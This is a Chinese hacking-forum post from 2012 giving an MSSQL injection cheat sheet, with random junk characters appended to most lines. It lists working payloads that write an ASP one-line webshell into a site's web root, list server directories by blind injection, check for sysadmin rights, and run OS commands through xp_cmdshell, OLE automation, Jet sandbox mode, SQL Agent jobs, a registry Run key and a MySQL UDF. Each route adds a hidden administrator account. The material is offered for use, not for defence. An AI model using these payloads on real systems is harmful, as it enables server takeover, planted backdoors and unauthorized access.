找回密码
 立即注册
查看: 3335|回复: 0
打印 上一主题 下一主题

mssql实用命令及导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:49:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
MSSQL语句导出一句话木马3 e2 x* z6 @' R) P
首先确定网站的WEB路径. O9 s) R7 q5 J9 C0 b7 C3 a
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马  Q) a3 A; w5 e4 [' @7 X

( G, Z$ F7 L' Q$ K( A& q! h;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
- n) l( z' H) j# u" P//将一句话木马插入表中* d" n- O$ e- m# m8 y2 {) [

$ v, V* a# q0 N6 Q! z;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
0 E# z- Q1 ]6 i! x//导出一个ASP文件
5 S' S+ q2 o: B& O: g1 I# V8 M1 P9 z$ @& N# N$ A: V, P

5 O2 Q) I- V4 W7 p6 c2 E关于MSSQL列目录2 S, c, t  e3 \6 W0 j- r
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
5 x( E& p1 Y8 d9 W" h; K" yInsert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表4 e9 y, Q+ V( ~: h) K
' }& x3 H( l5 E4 N' x
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
- Q! {- o! t: r9 \; V" ^: p  l4 e0 ?1 A# M' `
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段0 a( V7 p: @! a( P5 M
0 K9 |3 z1 D9 s1 m7 R3 `( a) I
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
/ d+ |+ Z% N4 {3 r3 `+ b9 a
) y* b# W) F+ p9 i  \
2 A6 a. I0 u) _0 @" B数据库版本和权限查看! G" ^$ v4 ?4 ^
and 1=(select @@VERSION) //查看详细的数据库信息.
5 l' ]6 Y' {( _0 q. nand 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA" u6 h. P; t' `& A6 @9 b  F
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
; y8 W6 t6 W& t9 ^' [) ^+ ?' O" `' S* x  T' k5 G; F

) `; F! a& b$ {! S7 P3 h1.利用xp_cmdshell执行命令
9 u# R+ y5 i4 S8 zexec master..xp_cmdshell 'net user rfire 123456 /add'% [7 {6 t8 L% {
exec master..xp_cmdshell 'net localgroup administrators rfire /add'7 w% C2 \2 [" c. {3 }

( |& X9 u" L% I! T! k/ e9 b4 S恢复xp_cmdshell存储过程# U& R* P8 o9 c, K/ q$ s
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'" b' W) K0 k8 V$ W

0 w6 c' _0 {" h
8 o/ g% n7 j1 K) h2.利用SP_OAcreate和SP_OAMETHOD执行命令- V9 w! o0 q0 q/ R% V: k
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
: S2 w* _" }. V4 E5 L! x4 k! VDECLARE @shell INT //建立一个@shell实体4 R. C0 J. Z* i
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
, f1 t2 c) t" J. iEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例2 M* x/ w1 c. K6 g: W. `
. ^5 [8 ]& z" L% [

- z. Q/ w& ?$ E/ ?2 s3.利用沙盒模式0 e5 X6 `2 X  Y
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。  e# C: q3 _' Y( `0 m7 q
开启沙盒模式:3 p7 M! Y# X9 U
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
5 m1 A/ h7 A# h2 s) a) I7 M. ]. ?/ a! Z0 D9 l
执行命令:
- Q$ }4 ]/ B. i' eSelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');- M9 x. u, \, c4 k0 Z( J4 g

4 J- _  U* \+ Y8 ^# i
. B& }5 A; S5 o% d  T& q4.利用SQL代理执行命令
) G; ^! [% m+ W3 D+ tEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
% U' ~4 o8 l; O+ c' q& J* T9 J3 Y, A$ o' C  V0 F
执行命令:7 B, G) _" R- F' Y2 t' o
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错7 u/ W4 p3 {: {2 c3 U. }( ?) B& S
exec sp_add_job 'x'
" H' ?9 ~7 `: r4 Uexec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
8 L' k% X) e# W" f2 gexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
! {) V; ?# u  _. E4 E
5 d2 O' }  S, k' N( @  d* {' ]$ @* O# `/ w8 z0 x* D
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
3 Y  z  E/ _- G3 e3 J; @2 HEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'' e; h# o+ |1 }# C5 u4 s* Z
/ T2 p& _7 a7 o  m* u# A, s

) M7 J) Z/ T) N+ ?, C$ J6.MYSQL的命令执行/ `) {# M, L7 P9 i% a
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)/ i. d. n% R$ Z6 i
首先要在su.php下导出c:\windows\udf.dll+ j) M2 x& h! o) o
导出后执行创建自定义函数命令:
  V& l& a( J2 i/ u$ `' o; e% CCreate Function cmdshell returns string soname 'udf.dll'
) T% F. Y7 i$ h2 X% b执行命令
4 a& U8 |- L1 y/ P% zselect cmdshell('net user rfire 123456 /add')2 ~# |6 b$ U+ s& l: G. g
执行后删除函数 drop function cmdshell
6 c2 @) o, J7 S# |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表